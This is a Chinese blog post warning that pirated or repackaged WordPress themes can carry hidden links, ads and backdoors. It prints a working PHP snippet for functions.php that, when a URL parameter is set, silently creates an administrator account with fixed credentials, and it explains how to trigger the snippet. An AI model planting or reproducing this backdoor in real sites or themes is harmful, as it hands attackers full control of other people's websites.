最近访客
百度已收录

WordPress盗版主题中可能存在后门,杜绝盗版

WordPress除了大量官方的主题,还有为数众多的主题设计者发布免费和收费主题,很多童鞋经常到处收集主题拿回来测试使用,其中一些无良者将收集到的国外商业收费主题进行汉化修改,添加暗链、广告,甚至恶意代码,然后免费或者收费公开发布出去,诱使别人下载使用,达到不可告人的目的。另外,这些商业收费主题一般都是测试版本,主题代码不完善、功能缺失,个别测试版的商业主题启用后会自动向数据库中写入大量数据…….

WordPress盗版主题中可能存在后门,杜绝盗版-狐狸库

下面的代码更加邪恶,可以自动添加一个角色为管理员的用户。

add_action(\'wp_head\', \'holeinthewall\'); function holeinthewall() {
 	If ($_GET[\'backdoor\'] == \'go\') {
 		require(\'wp-includes/registration.php\');
 		If (!username_exists(\'username\')) {
 			$user_id = wp_create_user(\'username\', \'password\');
 			$user = new WP_User($user_id);
 			$user->set_role(\'administrator\');
 		} 	} }

将代码添加到您当前主题的 functions.php 文件或插件中,之后用特殊的链接,例如:example.com/?backdoor=go,打开这个链接后就会自动创建一个用户名:username 密码:password 的有管理员权限的用户并自动登录,之后想做什么都可以了。

所以,这里奉劝大家还是不要在自己的站点上使用盗版主题和插件,尽量到官方或原始发布站点下载主题,以免被开了后门也不知晓!

通过FTP,代码可用于找回管理员密码。

温馨提示:本文最后更新于2022/10/20 04:01:48。若文章内容或图片失效,请留言联系站长反馈!
!
也想出现在这里? 联系我们
创意广告
© 版权声明
THE END
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容